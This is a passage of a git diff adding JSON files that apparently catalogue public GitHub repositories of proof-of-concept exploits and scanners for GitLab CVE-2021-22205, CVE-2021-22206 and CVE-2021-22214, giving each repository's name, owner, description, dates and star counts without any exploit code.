+ "updated_at": "2024-06-19T16:06:58Z",
+ "pushed_at": "2024-06-19T16:06:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22205.json b/2021/CVE-2021-22205.json
new file mode 100644
index 0000000000..038a57fc06
--- /dev/null
+++ b/2021/CVE-2021-22205.json
@@ -0,0 +1,862 @@
+[
+ {
+ "id": 374151679,
+ "name": "Gitlab-CVE-2021-22205",
+ "full_name": "mr-r3bot\/Gitlab-CVE-2021-22205",
+ "owner": {
+ "login": "mr-r3bot",
+ "id": 37280106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37280106?v=4",
+ "html_url": "https:\/\/github.com\/mr-r3bot"
+ },
+ "html_url": "https:\/\/github.com\/mr-r3bot\/Gitlab-CVE-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-05T15:42:16Z",
+ "updated_at": "2024-05-31T12:26:10Z",
+ "pushed_at": "2021-11-02T14:45:24Z",
+ "stargazers_count": 184,
+ "watchers_count": 184,
+ "has_discussions": false,
+ "forks_count": 44,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 44,
+ "watchers": 184,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 422090493,
+ "name": "CVE-2021-22205",
+ "full_name": "XTeam-Wing\/CVE-2021-22205",
+ "owner": {
+ "login": "XTeam-Wing",
+ "id": 25416365,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25416365?v=4",
+ "html_url": "https:\/\/github.com\/XTeam-Wing"
+ },
+ "html_url": "https:\/\/github.com\/XTeam-Wing\/CVE-2021-22205",
+ "description": "Pocsuite3 For CVE-2021-22205",
+ "fork": false,
+ "created_at": "2021-10-28T06:29:37Z",
+ "updated_at": "2024-05-10T10:43:03Z",
+ "pushed_at": "2021-10-28T08:54:26Z",
+ "stargazers_count": 88,
+ "watchers_count": 88,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 88,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 422227118,
+ "name": "CVE-2021-22205",
+ "full_name": "r0eXpeR\/CVE-2021-22205",
+ "owner": {
+ "login": "r0eXpeR",
+ "id": 46040186,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46040186?v=4",
+ "html_url": "https:\/\/github.com\/r0eXpeR"
+ },
+ "html_url": "https:\/\/github.com\/r0eXpeR\/CVE-2021-22205",
+ "description": "CVE-2021-22205 Unauthorized RCE",
+ "fork": false,
+ "created_at": "2021-10-28T14:02:51Z",
+ "updated_at": "2023-09-28T11:32:44Z",
+ "pushed_at": "2021-10-28T14:20:05Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 422439214,
+ "name": "CVE-2021-22205",
+ "full_name": "antx-code\/CVE-2021-22205",
+ "owner": {
+ "login": "antx-code",
+ "id": 7877940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7877940?v=4",
+ "html_url": "https:\/\/github.com\/antx-code"
+ },
+ "html_url": "https:\/\/github.com\/antx-code\/CVE-2021-22205",
+ "description": "Gitlab CE\/EE RCE 未授权远程代码执行漏洞 POC && EXP CVE-2021-22205",
+ "fork": false,
+ "created_at": "2021-10-29T04:15:00Z",
+ "updated_at": "2023-09-28T11:32:45Z",
+ "pushed_at": "2021-11-04T02:17:54Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 422441947,
+ "name": "CVE-2021-22205",
+ "full_name": "Al1ex\/CVE-2021-22205",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-22205",
+ "description": "CVE-2021-22205& GitLab CE\/EE RCE",
+ "fork": false,
+ "created_at": "2021-10-29T04:30:45Z",
+ "updated_at": "2024-06-20T09:39:28Z",
+ "pushed_at": "2022-11-16T08:14:33Z",
+ "stargazers_count": 256,
+ "watchers_count": 256,
+ "has_discussions": false,
+ "forks_count": 98,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-22205"
+ ],
+ "visibility": "public",
+ "forks": 98,
+ "watchers": 256,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 422768409,
+ "name": "CVE-2021-22205",
+ "full_name": "whwlsfb\/CVE-2021-22205",
+ "owner": {
+ "login": "whwlsfb",
+ "id": 8212964,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8212964?v=4",
+ "html_url": "https:\/\/github.com\/whwlsfb"
+ },
+ "html_url": "https:\/\/github.com\/whwlsfb\/CVE-2021-22205",
+ "description": "CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖,可在win平台使用",
+ "fork": false,
+ "created_at": "2021-10-30T02:56:34Z",
+ "updated_at": "2023-09-28T11:32:47Z",
+ "pushed_at": "2021-10-30T03:04:03Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 422867551,
+ "name": "GitLab-preauth-RCE_CVE-2021-22205",
+ "full_name": "findneo\/GitLab-preauth-RCE_CVE-2021-22205",
+ "owner": {
+ "login": "findneo",
+ "id": 26852341,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26852341?v=4",
+ "html_url": "https:\/\/github.com\/findneo"
+ },
+ "html_url": "https:\/\/github.com\/findneo\/GitLab-preauth-RCE_CVE-2021-22205",
+ "description": "PoC in single line bash",
+ "fork": false,
+ "created_at": "2021-10-30T11:54:29Z",
+ "updated_at": "2023-09-08T12:31:48Z",
+ "pushed_at": "2021-10-30T12:01:36Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 423050288,
+ "name": "CVE-2021-22205",
+ "full_name": "Seals6\/CVE-2021-22205",
+ "owner": {
+ "login": "Seals6",
+ "id": 49613759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49613759?v=4",
+ "html_url": "https:\/\/github.com\/Seals6"
+ },
+ "html_url": "https:\/\/github.com\/Seals6\/CVE-2021-22205",
+ "description": "CVE-2021-22205未授权漏洞批量检测与利用工具",
+ "fork": false,
+ "created_at": "2021-10-31T04:15:30Z",
+ "updated_at": "2024-06-17T07:29:46Z",
+ "pushed_at": "2021-11-04T12:49:58Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-22205"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423172219,
+ "name": "CVE-2021-22205",
+ "full_name": "c0okB\/CVE-2021-22205",
+ "owner": {
+ "login": "c0okB",
+ "id": 57324119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57324119?v=4",
+ "html_url": "https:\/\/github.com\/c0okB"
+ },
+ "html_url": "https:\/\/github.com\/c0okB\/CVE-2021-22205",
+ "description": "CVE-2021-22205 RCE ",
+ "fork": false,
+ "created_at": "2021-10-31T14:34:51Z",
+ "updated_at": "2023-12-28T09:20:38Z",
+ "pushed_at": "2022-07-04T06:46:34Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423355188,
+ "name": "CVE-2021-22205-getshell",
+ "full_name": "shang159\/CVE-2021-22205-getshell",
+ "owner": {
+ "login": "shang159",
+ "id": 20499503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20499503?v=4",
+ "html_url": "https:\/\/github.com\/shang159"
+ },
+ "html_url": "https:\/\/github.com\/shang159\/CVE-2021-22205-getshell",
+ "description": "CVE-2021-22205-getshell",
+ "fork": false,
+ "created_at": "2021-11-01T06:06:04Z",
+ "updated_at": "2021-11-03T15:30:34Z",
+ "pushed_at": "2021-11-01T07:30:16Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 424530553,
+ "name": "CVE-2021-22205",
+ "full_name": "devdanqtuan\/CVE-2021-22205",
+ "owner": {
+ "login": "devdanqtuan",
+ "id": 88175750,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88175750?v=4",
+ "html_url": "https:\/\/github.com\/devdanqtuan"
+ },
+ "html_url": "https:\/\/github.com\/devdanqtuan\/CVE-2021-22205",
+ "description": "CVE-2021-22205& GitLab CE\/EE RCE",
+ "fork": false,
+ "created_at": "2021-11-04T09:01:07Z",
+ "updated_at": "2021-11-04T09:01:59Z",
+ "pushed_at": "2024-01-20T06:11:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 424839096,
+ "name": "cve-2021-22205",
+ "full_name": "hh-hunter\/cve-2021-22205",
+ "owner": {
+ "login": "hh-hunter",
+ "id": 91593280,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4",
+ "html_url": "https:\/\/github.com\/hh-hunter"
+ },
+ "html_url": "https:\/\/github.com\/hh-hunter\/cve-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-05T05:35:10Z",
+ "updated_at": "2021-11-05T16:30:25Z",
+ "pushed_at": "2021-11-05T16:30:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 425022767,
+ "name": "GitLab-CVE-2021-22205-",
+ "full_name": "runsel\/GitLab-CVE-2021-22205-",
+ "owner": {
+ "login": "runsel",
+ "id": 10703119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10703119?v=4",
+ "html_url": "https:\/\/github.com\/runsel"
+ },
+ "html_url": "https:\/\/github.com\/runsel\/GitLab-CVE-2021-22205-",
+ "description": "Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-11-05T16:56:06Z",
+ "updated_at": "2023-09-08T04:36:51Z",
+ "pushed_at": "2021-11-05T17:05:29Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 426338911,
+ "name": "GitLab-CVE-2021-22205-scanner",
+ "full_name": "faisalfs10x\/GitLab-CVE-2021-22205-scanner",
+ "owner": {
+ "login": "faisalfs10x",
+ "id": 51811615,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4",
+ "html_url": "https:\/\/github.com\/faisalfs10x"
+ },
+ "html_url": "https:\/\/github.com\/faisalfs10x\/GitLab-CVE-2021-22205-scanner",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-09T18:19:43Z",
+ "updated_at": "2024-04-24T17:28:35Z",
+ "pushed_at": "2021-11-12T07:40:09Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "gitlab",
+ "poc",
+ "scanner",
+ "shodan-python"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 426870978,
+ "name": "CVE-2021-22205",
+ "full_name": "inspiringz\/CVE-2021-22205",
+ "owner": {
+ "login": "inspiringz",
+ "id": 47313597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47313597?v=4",
+ "html_url": "https:\/\/github.com\/inspiringz"
+ },
+ "html_url": "https:\/\/github.com\/inspiringz\/CVE-2021-22205",
+ "description": "GitLab CE\/EE Preauth RCE using ExifTool",
+ "fork": false,
+ "created_at": "2021-11-11T04:34:07Z",
+ "updated_at": "2024-06-17T10:55:49Z",
+ "pushed_at": "2022-01-16T15:54:14Z",
+ "stargazers_count": 213,
+ "watchers_count": 213,
+ "has_discussions": false,
+ "forks_count": 39,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-22205",
+ "exploit",
+ "gitlab",
+ "pentest-scripts",
+ "preauth-rce",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 39,
+ "watchers": 213,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 431842886,
+ "name": "Golang-CVE-2021-22205-POC",
+ "full_name": "pizza-power\/Golang-CVE-2021-22205-POC",
+ "owner": {
+ "login": "pizza-power",
+ "id": 6135659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4",
+ "html_url": "https:\/\/github.com\/pizza-power"
+ },
+ "html_url": "https:\/\/github.com\/pizza-power\/Golang-CVE-2021-22205-POC",
+ "description": "A CVE-2021-22205 Gitlab RCE POC written in Golang",
+ "fork": false,
+ "created_at": "2021-11-25T12:47:27Z",
+ "updated_at": "2022-07-04T14:26:31Z",
+ "pushed_at": "2021-11-25T21:00:20Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 432503000,
+ "name": "GitLab-cve-2021-22205-nse",
+ "full_name": "DIVD-NL\/GitLab-cve-2021-22205-nse",
+ "owner": {
+ "login": "DIVD-NL",
+ "id": 56316504,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56316504?v=4",
+ "html_url": "https:\/\/github.com\/DIVD-NL"
+ },
+ "html_url": "https:\/\/github.com\/DIVD-NL\/GitLab-cve-2021-22205-nse",
+ "description": "NSE script to fingerprint if GitLab is vulnerable to cve-2021-22205-nse",
+ "fork": false,
+ "created_at": "2021-11-27T15:53:33Z",
+ "updated_at": "2022-07-28T12:46:16Z",
+ "pushed_at": "2021-11-27T16:31:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 440732240,
+ "name": "Gitlab-CVE-2021-22205",
+ "full_name": "w0x68y\/Gitlab-CVE-2021-22205",
+ "owner": {
+ "login": "w0x68y",
+ "id": 22195911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22195911?v=4",
+ "html_url": "https:\/\/github.com\/w0x68y"
+ },
+ "html_url": "https:\/\/github.com\/w0x68y\/Gitlab-CVE-2021-22205",
+ "description": "CVE-2021-22205 的批量检测脚本",
+ "fork": false,
+ "created_at": "2021-12-22T04:30:17Z",
+ "updated_at": "2024-06-06T06:04:09Z",
+ "pushed_at": "2021-12-22T04:34:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 468414500,
+ "name": "CVE-2021-22205-gitlab",
+ "full_name": "al4xs\/CVE-2021-22205-gitlab",
+ "owner": {
+ "login": "al4xs",
+ "id": 40411471,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40411471?v=4",
+ "html_url": "https:\/\/github.com\/al4xs"
+ },
+ "html_url": "https:\/\/github.com\/al4xs\/CVE-2021-22205-gitlab",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-10T16:03:47Z",
+ "updated_at": "2023-10-22T17:20:05Z",
+ "pushed_at": "2022-03-10T16:03:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469576094,
+ "name": "CVE-2021-22205",
+ "full_name": "honypot\/CVE-2021-22205",
+ "owner": {
+ "login": "honypot",
+ "id": 101309325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4",
+ "html_url": "https:\/\/github.com\/honypot"
+ },
+ "html_url": "https:\/\/github.com\/honypot\/CVE-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-14T04:09:18Z",
+ "updated_at": "2022-03-14T04:09:34Z",
+ "pushed_at": "2022-03-14T04:09:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482719088,
+ "name": "cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-",
+ "full_name": "momika233\/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-",
+ "owner": {
+ "login": "momika233",
+ "id": 56291820,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4",
+ "html_url": "https:\/\/github.com\/momika233"
+ },
+ "html_url": "https:\/\/github.com\/momika233\/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-",
+ "description": "GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) cve-2021-22205",
+ "fork": false,
+ "created_at": "2022-04-18T04:56:18Z",
+ "updated_at": "2023-09-28T11:38:03Z",
+ "pushed_at": "2022-04-18T04:56:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 516065519,
+ "name": "CVE-2021-22205",
+ "full_name": "keven1z\/CVE-2021-22205",
+ "owner": {
+ "login": "keven1z",
+ "id": 43847458,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43847458?v=4",
+ "html_url": "https:\/\/github.com\/keven1z"
+ },
+ "html_url": "https:\/\/github.com\/keven1z\/CVE-2021-22205",
+ "description": "CVE-2021-22205 检测脚本,支持getshell和命令执行",
+ "fork": false,
+ "created_at": "2022-07-20T16:57:57Z",
+ "updated_at": "2023-09-28T11:40:56Z",
+ "pushed_at": "2022-07-25T03:04:01Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-22205",
+ "gitlab"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 607046636,
+ "name": "CVE-2021-22205",
+ "full_name": "hhhotdrink\/CVE-2021-22205",
+ "owner": {
+ "login": "hhhotdrink",
+ "id": 102781103,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102781103?v=4",
+ "html_url": "https:\/\/github.com\/hhhotdrink"
+ },
+ "html_url": "https:\/\/github.com\/hhhotdrink\/CVE-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-27T07:42:12Z",
+ "updated_at": "2023-02-27T09:04:40Z",
+ "pushed_at": "2023-02-27T09:22:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 611714461,
+ "name": "CVE-2021-22205",
+ "full_name": "sei-fish\/CVE-2021-22205",
+ "owner": {
+ "login": "sei-fish",
+ "id": 66983450,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66983450?v=4",
+ "html_url": "https:\/\/github.com\/sei-fish"
+ },
+ "html_url": "https:\/\/github.com\/sei-fish\/CVE-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-09T11:53:37Z",
+ "updated_at": "2023-03-09T11:53:37Z",
+ "pushed_at": "2023-03-09T11:53:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 673613322,
+ "name": "DejaVu-CVE-2021-22205",
+ "full_name": "overgrowncarrot1\/DejaVu-CVE-2021-22205",
+ "owner": {
+ "login": "overgrowncarrot1",
+ "id": 78485709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4",
+ "html_url": "https:\/\/github.com\/overgrowncarrot1"
+ },
+ "html_url": "https:\/\/github.com\/overgrowncarrot1\/DejaVu-CVE-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-02T03:15:59Z",
+ "updated_at": "2023-08-02T03:18:20Z",
+ "pushed_at": "2023-08-02T03:18:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 689120452,
+ "name": "CVE-2021-22205",
+ "full_name": "Hikikan\/CVE-2021-22205",
+ "owner": {
+ "login": "Hikikan",
+ "id": 74212724,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74212724?v=4",
+ "html_url": "https:\/\/github.com\/Hikikan"
+ },
+ "html_url": "https:\/\/github.com\/Hikikan\/CVE-2021-22205",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-08T21:16:40Z",
+ "updated_at": "2023-09-08T21:16:41Z",
+ "pushed_at": "2023-09-08T21:56:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 712969635,
+ "name": "gitlab-cve-2021-22205",
+ "full_name": "NukingDragons\/gitlab-cve-2021-22205",
+ "owner": {
+ "login": "NukingDragons",
+ "id": 9376673,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9376673?v=4",
+ "html_url": "https:\/\/github.com\/NukingDragons"
+ },
+ "html_url": "https:\/\/github.com\/NukingDragons\/gitlab-cve-2021-22205",
+ "description": "A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab",
+ "fork": false,
+ "created_at": "2023-11-01T15:19:01Z",
+ "updated_at": "2023-11-06T00:16:03Z",
+ "pushed_at": "2023-11-01T15:23:01Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803032803,
+ "name": "CVE-2021-22205",
+ "full_name": "cc3305\/CVE-2021-22205",
+ "owner": {
+ "login": "cc3305",
+ "id": 103961201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4",
+ "html_url": "https:\/\/github.com\/cc3305"
+ },
+ "html_url": "https:\/\/github.com\/cc3305\/CVE-2021-22205",
+ "description": "CVE-2021-22205 exploit script",
+ "fork": false,
+ "created_at": "2024-05-19T23:14:48Z",
+ "updated_at": "2024-06-19T16:10:49Z",
+ "pushed_at": "2024-06-19T16:10:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22206.json b/2021/CVE-2021-22206.json
new file mode 100644
index 0000000000..c67579af5c
--- /dev/null
+++ b/2021/CVE-2021-22206.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 423994472,
+ "name": "CVE-2021-22206",
+ "full_name": "dannymas\/CVE-2021-22206",
+ "owner": {
+ "login": "dannymas",
+ "id": 34144449,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34144449?v=4",
+ "html_url": "https:\/\/github.com\/dannymas"
+ },
+ "html_url": "https:\/\/github.com\/dannymas\/CVE-2021-22206",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-02T20:48:30Z",
+ "updated_at": "2022-09-15T02:50:48Z",
+ "pushed_at": "2021-11-01T05:47:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22214.json b/2021/CVE-2021-22214.json
new file mode 100644
index 0000000000..325a5cf628
--- /dev/null
+++ b/2021/CVE-2021-22214.json
@@ -0,0 +1,130 @@
+[
+ {
+ "id": 379275650,
+ "name": "CVE-2021-22214",
+ "full_name": "aaminin\/CVE-2021-22214",
+ "owner": {
+ "login": "aaminin",
+ "id": 47250161,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47250161?v=4",
+ "html_url": "https:\/\/github.com\/aaminin"
+ },
+ "html_url": "https:\/\/github.com\/aaminin\/CVE-2021-22214",
+ "description": "Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)",
+ "fork": false,
+ "created_at": "2021-06-22T13:15:43Z",
+ "updated_at": "2023-09-28T11:28:55Z",
+ "pushed_at": "2021-06-22T04:35:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
